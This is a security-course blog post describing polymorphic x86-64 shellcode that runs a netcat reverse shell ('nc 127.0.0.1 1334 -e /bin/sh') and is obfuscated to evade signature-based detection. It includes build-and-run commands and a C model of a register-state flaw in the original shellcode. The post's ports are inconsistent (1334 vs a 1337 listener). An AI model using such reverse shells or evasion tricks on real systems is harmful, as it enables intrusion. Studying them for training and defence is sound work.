This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html
The Original Version: http://shell-storm.org/shellcode/files/shellcode-823.php
Original Size: 109 bytes
My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyNetCatRevShell1434.nasm
Published: https://www.exploit-db.com/exploits/41510/
My version:
Number of bytes = 106
Number of nulls = 0
PolyNetCatRevShell1434.nasm
Intro
The PolyNetCatRevShell1434 shellcode does an execve system call to run the command: nc 127.0.0.1 1334 -e /bin/sh
Polymorphic
This is a polymorphic version of the original author's code which does basically the same thing. I rewrote the original author's code and shrank its size down to 72 bytes. See: http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
Then I rewrote that minimal-size version to obfuscate what is happening a little, which has bloated the code back up to 106 bytes. Overall this produces bytecode that would generate a different signature and defeat signature-based detection.
The 3 eight-byte strings from my minimal version have been reversed, encoded in hex and placed at the beginning of the shellcode. Then a procedure at the label "handle" is called to load these 8-byte strings and push them onto the stack. It is worth noting that this design would permit further encrypting these 8-byte strings by putting the decryption steps in this handle procedure.
The last touch is to disguise the value that we put into RAX, which indicates the system call that we wish to make. Because the value manipulated is pulled from the stack, you would have to rework this section of code if you wish to change the length of the IP address or port strings that you are putting onto the stack.
Testing
Download:
wget https://raw.githubusercontent.com/rtaylor777/nasm/master/PolyNetCatRevShell1434.nasm
Assuming you have the NASM assembler ( http://www.nasm.us/ ):
Assemble:
nasm -felf64 PolyNetCatRevShell1434.nasm -o PolyNetCatRevShell1434.o
Link:
ld PolyNetCatRevShell1434.o -o PolyNetCatRevShell1434
Execute:
./PolyNetCatRevShell1434
But Wait
Before you run the shellcode you need to make sure that there is a client listening on port 1337, otherwise the shellcode will exit with an error that looks like this:
For this you can use the netcat command (nc, ncat):
nc -l -p 1337 127.0.0.1
Please See
If you are new to shellcode or shellcoding you should start by reading my blog post: http://a41l4.blogspot.ca/2017/01/execvestack1434.html
Then I suggest you read over my NetCatRevShell1434 blog post: http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html since this polymorphic version is just an obfuscated version of that.
Shellcode.c
If you missed it from my previous blog posts the shellcode.c file is auto generated by my helper scripts. See: http://a41l4.blogspot.ca/2017/02/slae-helper-scripts.html
The Original Shellcode
http://shell-storm.org/shellcode/files/shellcode-823.php
I felt it was worth mentioning that the original shellcode actually has a flaw. The author assumed that the value of RAX would be zero, or at least constrained to the size of a byte. His only interaction with RAX was near the end, where he executes:
mov al,59
So when running his shellcode in my shellcode.c file, which pollutes all the main registers with 0xffffffffffffffff before calling the shellcode, it fails. I think this is important since I don't believe that there is any guarantee that RAX is in any particular state when injecting the shellcode into a process, via buffer overflow or what have you.
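The flaw comes down to how x86-64 partial-register writes work. The C program below is an added model of that behaviour, not the blog's or the original author's code: it models `mov al, imm8`, `mov eax, imm32` and `xor rax, rax` on a 64-bit value, then runs the original "only write AL" sequence and a state-independent sequence against two constructed entry states, a clean RAX and the 0xffffffffffffffff the blog's harness uses.

```c
/* Added example (not the blog's code): x86-64 partial-register write
 * semantics behind the `mov al,59` flaw. Entry values are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SYS_EXECVE 59u  /* x86-64 execve syscall number, as in `mov al,59` */

/* `mov al, imm8` changes only bits 0..7 and leaves the other 56 bits alone. */
uint64_t mov_al(uint64_t rax, uint8_t imm)
{
    return (rax & ~(uint64_t)0xff) | imm;
}

/* `mov eax, imm32` writes the low 32 bits and zero-extends into the high 32. */
uint64_t mov_eax(uint64_t rax, uint32_t imm)
{
    (void)rax;              /* previous contents do not survive */
    return (uint64_t)imm;
}

/* `xor rax, rax` leaves the register at zero whatever it held before. */
uint64_t xor_rax_rax(uint64_t rax)
{
    return rax ^ rax;
}

/* The original shellcode's approach: only the low byte is ever written. */
uint64_t original_sequence(uint64_t rax_on_entry)
{
    return mov_al(rax_on_entry, SYS_EXECVE);
}

/* A sequence that does not depend on the state of RAX at entry. */
uint64_t fixed_sequence(uint64_t rax_on_entry)
{
    return mov_al(xor_rax_rax(rax_on_entry), SYS_EXECVE);
}

/* Does the value left in RAX select execve? The syscall number is taken
 * from the whole register, so 0xffffffffffffff3b does not select it. */
int selects_execve(uint64_t rax)
{
    return rax == SYS_EXECVE;
}

int main(void)
{
    /* Constructed entry states: clean, and polluted as by the shellcode.c harness. */
    uint64_t entries[] = { 0, 0xffffffffffffffffULL };
    for (size_t i = 0; i < 2; i++) {
        printf("RAX on entry=0x%016llx original->%d fixed->%d\n",
               (unsigned long long)entries[i],
               selects_execve(original_sequence(entries[i])),
               selects_execve(fixed_sequence(entries[i])));
    }
    return 0;
}
```

With a clean register both sequences reach 59; with the polluted register the original sequence leaves 0xffffffffffffff3b in RAX, so the system call the author intended is never selected, which is exactly the failure observed with the shellcode.c harness.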
Summary
The PolyNetCatRevShell1434 shellcode runs the netcat command to connect back to a client and then launch a /bin/sh shell for the client to interact with. Despite the efforts to make what this version of the shellcode is doing obscure, I have managed to reduce the size from the original author's shellcode by 3 bytes.
If you wish to learn more about assembly language, I highly recommend the "SecurityTube Linux Assembly Expert course and certification."
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/